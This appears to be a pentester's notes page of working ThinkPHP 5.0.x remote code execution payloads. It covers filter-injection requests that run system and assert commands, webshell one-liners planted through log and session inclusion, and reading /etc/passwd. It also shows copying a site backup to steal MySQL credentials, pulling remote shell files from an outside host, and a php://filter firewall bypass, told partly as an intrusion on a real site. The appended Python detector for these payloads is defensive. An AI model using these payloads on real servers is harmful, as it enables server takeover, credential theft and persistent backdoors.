ThinkPHP 5.0.1 pitfalls
April 18, 2021

Checking whether the vulnerability is present
http://xxx.com/public
/index.php?s=captcha
/?s=captcha
On 5.0.5 (not the full release) there is no captcha route; use /index.php/index instead.

5.0.12<thinkphp<5.0.24 with debug enabled, the payload is:
?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc

5.0.12<thinkphp<5.0.24 with the captcha route present, debug does not need to be enabled; the payload is:
?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get

5.0.22 with debug enabled, print phpinfo:
/index.php/index
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111

Read the log:
/index.php/index
_method=__construct&filter[]=readfile&server[REQUEST_METHOD]=../runtime/log/202012/04.log

Write the shell into the log file:
/index.php/index
_method=__construct&filter[]=call_user_func&server[REQUEST_METHOD]=<?php @eval($_POST['cmd']);?>

Include the log file:
/index.php/index
_method=__construct&filter[]=think\__include_file&server[REQUEST_METHOD]=../runtime/log/202012/04.log&cmd=phpinfo();

5.0.22 with the route present, no debug needed:
/index.php?s=captcha
_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=1111111&method=get
index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
s=phpinfo()&_method=__construct&filter=assert
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter=call_user_func&get[]=phpinfo
_method=__construct&method=get&filter[]=call_user_func&get[0]=phpinfo&get[1]=1

Determine which operating system it is:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ipconfig

Get the current directory path:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=chdir

Write 123.php into the current directory:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval($_REQUEST[1])?>" >123.php
/public/123.php?1=phpinfo();;)
http:/xxxx.com/?s=index/index/index
s=ipconfig&_method=__construct&method=&filter[]=system

When only the assert function is usable: how to write files and how to read MySQL

The include function can be used to view certain files and their configuration:
s=include("/etc/passwd")&_method=__construct&filter=assert
Read a file:
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../application/.htaccess
s=include("../application/.htaccess")&_method=__construct&filter=assert // note: if you do not prefix with .., give the full path

After reading the file, because some key directories had been changed by the administrator, we used the var_dump function to list the folder contents.

var_dump can list the files and folders under a given path:
s=var_dump(scandir('../application/'))&_method=__construct&filter=assert
An error message revealed that the site's web root is /data/wwwroot/public/.

Unexpectedly, a site backup file was found under the /data/ directory.

Copy the file:
s=copy("/data/ws.tar", "/data/wwwroot/public/ws.tar")&_method=__construct&filter=assert
Download it directly over the web, find the config file locally, and connect to MySQL.

A write command worked out for version 5.0.1: the file_put_contents function writes a file directly.
s=file_put_contents('/data/wwwroot/test.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4'))&_method=__construct&filter=assert

Log inclusion
Write the shell into the log:
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>

Get a shell through log inclusion:
_method=__construct&method=get&filter=think\__include_file&get[]=/www/wwroot/runtime/log/202110/28.log

Include the log:
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();

If the log file is large, copy in a fresh one-liner:
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=echo copy("https://www.xxx.com/1.txt","D:/phpstudy_pro/WWW/tp5/ant.php");

If the log is not writable, try writing ant under C:/windows/temp/:
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=file_put_contents(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70%5C%61%6E%74"),fopen("https://www.xxx.com/1.txt",'r'));

Check whether the write succeeded:
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=../runtime/log/202012/03.log&apple=$a="var_dump";$a(scandir(urldecode("%43%3A%5C%57%69%6E%64%6F%77%73%5C%54%65%6D%70")));

Include C:/windows/temp/ant again:
/?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&server[]=-1&get[]=C:\Windows\Temp\ant&ant=phpinfo();

Getting a shell via session inclusion
Write the shell into the session:
POST /?s=captcha
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

Include the session to get a shell:
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=/tmp/sess_kking&server[]=1

Set the session (the base64 part decodes to <?php eval(base64_decode($_POST['abc']));?>):
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=aaPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYWJjJ10pKTs/Pg&server[]=1

Use a PHP stream wrapper in the include to get past the firewall:
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
_method=__construct&method=get&filter[]=strrev&filter[]=think\__include_file&get[]=/tmp/sess_kking/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php&abc=cGhwaW5mbygpOw==

Encode the payload:
_method=__construct&method=get&filter=think\Session::set&get[]=<?PHP $str="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"; file_put_contents('/www/wwwroot/icon.png',base64_decode("$str"));;
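As an added defender-side example (not part of the original notes), a Python check that flags the two payload families shown above in request records: the _method=__construct plus filter combination and the think\app/invokefunction route. The suspicious-filter set and the sample requests are constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Callables and ThinkPHP helpers the payloads on this page pass through
# the `filter` parameter; this set is an assumption for detection only.
SUSPICIOUS_FILTERS = {
    "system", "assert", "call_user_func", "phpinfo", "readfile",
    "think\\__include_file", "think\\session::set",
}

def _params(raw: str) -> dict:
    """Parse a query string or form body into {name: [values]}, folding PHP
    array syntax (filter[], server[REQUEST_METHOD], get[]) onto the base name."""
    out = {}
    for key, values in parse_qs(raw, keep_blank_values=True).items():
        base = re.sub(r"\[.*?\]", "", key).lower()
        out.setdefault(base, []).extend(values)
    return out

def is_thinkphp_rce(query: str, body: str = "") -> list:
    """Return the indicators found in one request; an empty list means clean.
    The page's payloads pair _method=__construct with a `filter` naming a
    callable, or route to think\\app/invokefunction through the `s` parameter."""
    p = _params(query)
    for name, values in _params(body).items():
        p.setdefault(name, []).extend(values)
    reasons = []
    override = any(v.lower() == "__construct" for v in p.get("_method", []))
    filters = [v for v in p.get("filter", []) if v.lower() in SUSPICIOUS_FILTERS]
    if override and filters:
        reasons.append("_method=__construct with filter=" + ",".join(filters))
    elif override:  # REST apps override _method with put/delete, never __construct
        reasons.append("_method=__construct")
    if any("invokefunction" in v.lower() for v in p.get("s", [])):
        reasons.append("route to think\\app/invokefunction")
    return reasons

# Constructed sample traffic as (query string, POST body); not real server logs.
SAMPLE_REQUESTS = [
    ("s=captcha", "_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get"),
    (r"s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", ""),
    ("s=captcha", "_method=put&name=alice"),  # benign method override
    ("s=index/index", ""),                    # benign
]

def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return [(index, reasons)] for every request that tripped a rule."""
    return [(i, r) for i, (q, b) in enumerate(requests) if (r := is_thinkphp_rce(q, b))]
```

Feed scan() the query string and body of each request pulled from the access log or a WAF capture; it reports only the two signals above, so a hit should be followed by a check of the runtime/log and session directories the payloads write to.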